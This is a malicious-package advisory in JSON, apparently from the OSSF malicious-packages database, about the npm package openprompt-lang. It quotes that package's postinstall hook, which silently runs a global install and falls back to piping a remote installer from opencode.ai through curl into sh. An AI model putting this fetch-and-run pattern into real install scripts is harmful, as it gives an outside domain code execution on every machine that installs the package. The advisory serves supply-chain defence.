{"id":"MAL-2026-4630","summary":"Malicious code in openprompt-lang (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2c9966d5fe1ab82b40fd24082c36cc9acf5677772768f75b30cda755d9cdd98f)\nscripts/postinstall.js runs unconditionally during `npm install`. When the `opencode` binary is not on PATH (true for nearly every fresh install), it executes `npm install -g @opencode/cli 2\u003e/dev/null || curl -fsSL https://opencode.ai/install.sh 2\u003e/dev/null | sh`. The first branch performs an unpinned global (`-g`) install of `@opencode/cli`, silently extending the package's effective dependency surface beyond what its manifest declares; because stderr is discarded, a failure of that branch is invisible to the user. When it exits non-zero (for example, no write access to the global prefix, or the package cannot be resolved), the `||` fallback pipes `curl` straight into `sh`: it fetches a mutable remote installer over the network and executes it with no hash or signature verification, no version pin, and from a third-party domain (opencode.ai) unrelated to the package publisher. Both branches run with the privileges of whatever account invokes `npm install`, so in container or CI builds that install as root this is root-level execution. Running `npm install --ignore-scripts` (or setting `ignore-scripts=true` in .npmrc) prevents the postinstall hook from executing at all. The package's stated purpose is a CLI for AI-annotation/context engineering; auto-installing an unrelated third-party tool via `curl | sh` from a non-publisher domain at install time is outside that scope and gives whoever controls opencode.ai or its hosting (now or in the future) arbitrary code execution on every machine that installs this 
package.\n","modified":"2026-05-26T06:02:45.461883444Z","published":"2026-05-23T23:03:36Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","sha256":"0b3d3d4d116f031b0ac1d902eea51337d80a08e1885acc484d698ba38d2aabdb","id":"IN-MAL-2026-004585","versions":["1.3.0"],"import_time":"2026-05-26T05:52:53.3295444Z","modified_time":"2026-05-25T05:35:48Z"},{"source":"amazon-inspector","sha256":"19fb259f5df1648c36db4fa24dc1d050912e3fceabc8235316141e9febfe0b45","id":"IN-MAL-2026-004423","versions":["1.2.6"],"modified_time":"2026-05-24T00:58:58Z","import_time":"2026-05-26T05:52:34.289865541Z"},{"source":"amazon-inspector","sha256":"2c9966d5fe1ab82b40fd24082c36cc9acf5677772768f75b30cda755d9cdd98f","id":"IN-MAL-2026-004422","versions":["1.2.6"],"modified_time":"2026-05-24T00:57:45Z","import_time":"2026-05-26T05:52:34.183494259Z"},{"source":"amazon-inspector","sha256":"560085e8391d93e3f1c17bd78a1f3273b240f098442ab2f0414f1fb5cc2f6d3c","id":"IN-MAL-2026-004449","versions":["1.2.7"],"modified_time":"2026-05-24T02:29:05Z","import_time":"2026-05-26T05:52:37.338586987Z"},{"source":"amazon-inspector","sha256":"a127c4981cfea8a1be921c08b4ac3e915371041838d3981efc24ddc53b694a5d","id":"IN-MAL-2026-004414","versions":["1.2.4"],"modified_time":"2026-05-24T00:38:07Z","import_time":"2026-05-26T05:52:33.29493036Z"},{"source":"amazon-inspector","sha256":"a91abce6346f158c33db03696583627a1cf7f6805aa6b3f69afc85e0a32855d8","id":"IN-MAL-2026-004413","versions":["1.2.4"],"modified_time":"2026-05-24T00:37:20Z","import_time":"2026-05-26T05:52:33.159133434Z"},{"source":"amazon-inspector","sha256":"b90e8e14dd8b898c010517a81ca6e33ab98d90a514fd58d4457899c71120300a","id":"IN-MAL-2026-004409","versions":["1.2.1"],"modified_time":"2026-05-24T00:14:52Z","import_time":"2026-05-26T05:52:32.704275064Z"},{"source":"amazon-inspector","sha256":"e0a29910da10cc8d97c356e724ac483dff82a0c91225e3cdb868f1d160886d92","id":"IN-MAL-2026-004402","versions":["1.2.0"],"modified_time":"2026-05-23T23:35:56
Z","import_time":"2026-05-26T05:52:31.667285387Z"},{"source":"amazon-inspector","sha256":"db2d671dd8a5cc56fe37c817c6f7a63f46f2692b858bf0ca2aa5edc34dbb15b0","id":"IN-MAL-2026-004408","versions":["1.2.1"],"modified_time":"2026-05-24T00:13:43Z","import_time":"2026-05-26T05:52:32.417343895Z"},{"source":"amazon-inspector","sha256":"29ec99421b46db9c46b09afbe1da0db595ab63584c54f31e04101739273ce992","id":"IN-MAL-2026-004411","versions":["1.2.2"],"modified_time":"2026-05-24T00:22:56Z","import_time":"2026-05-26T05:52:32.929380025Z"},{"source":"amazon-inspector","sha256":"4b78d9c204ace5f9ebde348fd931fb542ab85cd9297d0f4728fa904d5cb44a48","versions":["1.2.3"],"id":"IN-MAL-2026-004412","modified_time":"2026-05-24T00:33:14Z","import_time":"2026-05-26T05:52:33.028301822Z"},{"source":"amazon-inspector","sha256":"aba8dd892bd7521ed379e360d72bd0a09255a929e64e0d33a0cf76035e65da1c","id":"IN-MAL-2026-004448","versions":["1.2.7"],"modified_time":"2026-05-24T02:27:50Z","import_time":"2026-05-26T05:52:37.228436646Z"},{"source":"amazon-inspector","sha256":"b374a3566f692f636a236c0243da650b4db264f029477c431634bd805fca1626","id":"IN-MAL-2026-004399","versions":["1.1.0"],"import_time":"2026-05-26T05:52:31.353973464Z","modified_time":"2026-05-23T23:03:36Z"},{"source":"amazon-inspector","sha256":"e69c04ece59cfc2568d850cfc0e4554a9799196e29bdcfffbe61a04451714a0d","id":"IN-MAL-2026-004410","versions":["1.2.2"],"import_time":"2026-05-26T05:52:32.799550433Z","modified_time":"2026-05-24T00:22:04Z"},{"source":"amazon-inspector","sha256":"90498cc911c11219a4c19a0c864132e7e42de8e63f4f52b44360cd19d318e913","id":"IN-MAL-2026-004586","versions":["1.3.0"],"modified_time":"2026-05-25T05:37:21Z","import_time":"2026-05-26T05:52:53.518281193Z"},{"source":"amazon-inspector","sha256":"c559dde5b95604374665d3f852b7ad50ee78568e7a517a182496362838678e07","id":"IN-MAL-2026-004400","versions":["1.1.0"],"modified_time":"2026-05-23T23:03:37Z","import_time":"2026-05-26T05:52:31.4594297Z"},{"source":"amazon-inspector","sha256":"
c9301d7c5a77059d6948110ed5ce20651c37b8df367db99f5f807496313fc33d","versions":["1.2.0"],"id":"IN-MAL-2026-004404","modified_time":"2026-05-23T23:36:56Z","import_time":"2026-05-26T05:52:31.859851238Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.3.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.1.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/openprompt-lang/v/1.2.2"}],"affected":[{"package":{"name":"openprompt-lang","ecosystem":"npm","purl":"pkg:npm/openprompt-lang"},"versions":["1.3.0","1.2.6","1.2.7","1.2.4","1.2.1","1.2.0","1.2.2","1.2.3","1.1.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/openprompt-lang/MAL-2026-4630.json","cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious 
Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-AQgBNBhfzGND+x14tiAutREAWF1eSlEItVAth1S7e0RvwbRtSlMDF3Q4FYzXhtp+f7v6aaNn/w00htJUBgQm2A==","sha1":"d9b5efbc402ec6a1373b98740a72573274325873"},"filename":"openprompt-lang-1.3.0.tgz"}],"domains":["34.9.16.104.in-addr.arpa"],"evidence_files":[{"sha256":"2515e6c5a0ee46d25c8811e35e5e2679fcbe08cfb77b27f6e82c172165c19c58","path":"scripts/postinstall.js","tlsh":"4eb1e07692f801343f42c0ad3d1b1012b07a79637704f9987b9ebba95fcd82885622fd"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}